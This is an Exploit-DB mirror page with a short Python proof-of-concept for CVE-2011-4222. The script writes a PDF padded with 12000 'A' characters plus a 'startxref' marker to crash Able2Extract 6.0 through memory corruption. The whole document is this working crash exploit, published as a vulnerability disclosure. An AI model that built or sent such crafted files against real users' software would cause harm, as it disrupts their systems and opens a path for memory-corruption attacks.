exploit-db-mirror/exploits/windows/dos/19392.py
Offensive Security 36c084c351 DB: 2021-09-03
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

18 lines
No EOL
390 B
Python
Executable file

# Exploit Title: Able2Extract and Able2Extract Server v 6.0 Memory
Corruption
# Date: June 24 2012
# Exploit Author: Carlos Mario Penagos Hollmann
# Vendor Homepage: www.investintech.com
# Version:6.0
# Tested on: Windows 7
# CVE : cve-2011-4222
payload ="A"*12000
crash="startxref"
pdf=payload+crash
filename = "slimpdPoC.pdf"
file = open(filename,"w")
file.writelines(pdf)
file.close()